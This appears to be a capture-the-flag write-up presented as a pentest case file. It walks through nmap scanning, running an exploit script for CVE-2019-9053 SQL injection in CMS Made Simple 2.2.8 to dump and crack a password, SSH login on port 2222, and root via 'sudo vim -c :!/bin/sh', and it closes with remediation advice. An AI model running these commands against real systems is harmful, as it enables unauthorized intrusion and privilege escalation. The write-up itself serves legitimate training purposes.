CMSMS SQLi CVE-2019-9053, SSH on 2222, and sudo vim root
Foundations Linux engagement: unauthenticated CMS Made Simple SQLi dumped and cracked mitch’s password; SSH on port 2222 yielded a shell; NOPASSWD vim completed root.
- Case files
- CMSMS SQLi CVE-2019-9053, SSH on 2222, and sudo vim root
CMS Made Simple 2.2.8 under /simple/ was vulnerable to CVE-2019-9053. Cracked admin hash authenticated SSH on 2222; sudo vim spawned root.
Time-based SQLi dumped mitch’s hash; offline crack recovered secret.
mitch:secret authenticated on port 2222.
NOPASSWD vim executed /bin/sh as root.
Engagement summary
CMS Made Simple 2.2.8 under /simple/ was vulnerable to CVE-2019-9053. Cracked admin hash authenticated SSH on 2222; sudo vim spawned root.
SIMPLE CTF exposed FTP, HTTP with CMS Made Simple 2.2.8 at /simple/, and SSH on 2222. Exploit-DB / local exploit.py for CVE-2019-9053 performed time-based SQLi against moduleinterface.php, dumping salt and mitch’s password hash; --crack with rockyou recovered secret. SSH mitch@IP -p 2222 succeeded. sudo -l allowed /usr/bin/vim; sudo vim -c ':!/bin/sh' returned root. A second home user sunbath was present but unused for the root path.
Business impact
Unauthenticated CMS SQLi is credential theft and often RCE. Nonstandard SSH ports are not secrecy. Interactive editors under sudo are root. Patch CMS Made Simple past CVE-2019-9053, require keys for SSH, and remove vim from sudoers.
CVE-2019-9053 dump and crack
Time-based SQLi dumped mitch’s hash; offline crack recovered secret.
OPERATOR · SQLI
savvy@lab:~$ nmap -sC -sV 10.10.25.90
21/tcp open ftp
80/tcp open http
2222/tcp open ssh
savvy@lab:~$ python exploit.py -u http://10.10.25.90/simple --crack -w /usr/share/wordlists/rockyou.txt
username: mitch password: secret
SSH on high port
mitch:secret authenticated on port 2222.
OPERATOR · SSH
savvy@lab:~$ ssh mitch@10.10.25.90 -p 2222
savvy@lab:~$
savvy@lab:~$ ls /home
mitch sunbath
sudo vim to root
NOPASSWD vim executed /bin/sh as root.
OPERATOR · ROOT
savvy@lab:~$ sudo -l
(root) NOPASSWD: /usr/bin/vim
savvy@lab:~$ sudo vim -c ':!/bin/sh'
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Upgrade CMS Made Simple; WAF alone is insufficient for time-based SQLi. Prefer key-only SSH on standard ports behind ACLs. Never grant interactive editors via sudo.